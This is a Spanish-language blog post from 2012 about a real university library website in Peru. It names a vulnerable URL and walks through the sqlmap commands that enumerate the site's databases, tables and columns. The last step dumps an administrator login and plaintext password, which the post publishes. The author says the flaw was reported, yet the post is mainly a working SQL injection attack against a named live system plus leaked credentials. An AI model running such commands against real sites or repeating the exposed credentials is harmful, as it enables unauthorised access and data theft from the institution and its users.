viernes, 22 de junio de 2012

Base de Datos - Universidad de San Martín de Porres - Perú


Hola, hace tiempo había leído que esta Universidad era una de las mejores de Perú, pero sin embargo no lo es, aunque no lo crean tiene las mismas vulnerabilidades que tienen todas las Universidades de Perú, la cual permite obtener toda su base de datos con un simple bug...

Bueno, sin mas que decir...

Sitio Web: http://www.sibus.usmp.edu.pe
Link Vulnerable: http://www.sibus.usmp.edu.pe/servicio.php?cat=1
Vulnerabilidad: SQL Injection

Base de datos desde el SLQMAP:

./sqlmap.py -u http://www.sibus.usmp.edu.pe/servicio.php?cat=1 --dbs

available databases [4]:                                                                                                                                                       

[*] biblioteca
[*] information_schema
[*] mysql
[*] test

./sqlmap.py -u http://www.sibus.usmp.edu.pe/servicio.php?cat=1 -D biblioteca --tables

Database: biblioteca                                                                                                                                                           
[28 tables]
+-----------------------+
| adq_categoria         |
| adquisicion           |
| biblioteca_virtual    |
| carne                 |
| directorio            |
| docente_inscripcion   |
| ebsco_inscripcion     |
| egresado_inscripcion  |
| enlace                |
| galeria               |
| galeria_fotos         |
| guia_manual           |
| imagen                |
| info_general          |
| infonauta             |
| logo                  |
| martino               |
| novedad               |
| personal              |
| personal_foto         |
| publicaciones         |
| reglamento            |
| revista               |
| revista_numero        |
| servicio              |
| temporada             |
| usuario               |
| visitante_inscripcion |
+-----------------------+

./sqlmap.py -u http://www.sibus.usmp.edu.pe/servicio.php?cat=1 -D biblioteca -T usuario --columns

Database: biblioteca                                                                                                                                                           
Table: usuario
[2 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| login    | varchar(50) |
| password | varchar(50) |
+----------+-------------+

./sqlmap.py -u http://www.sibus.usmp.edu.pe/servicio.php?cat=1 -D biblioteca -T usuario -C login,password --dump

Database: biblioteca
Table: usuario
[1 entry]
+-------+----------------+
| login | password       |
+-------+----------------+
| admin | u5mpb1bl10tec@ |
+-------+----------------+

La Vulnerabilidad ha sido respectivamente REPORTADA, por lo tanto espero que sea arreglado lo mas pronto posible.

Saludos.

No hay comentarios:

Publicar un comentario en la entrada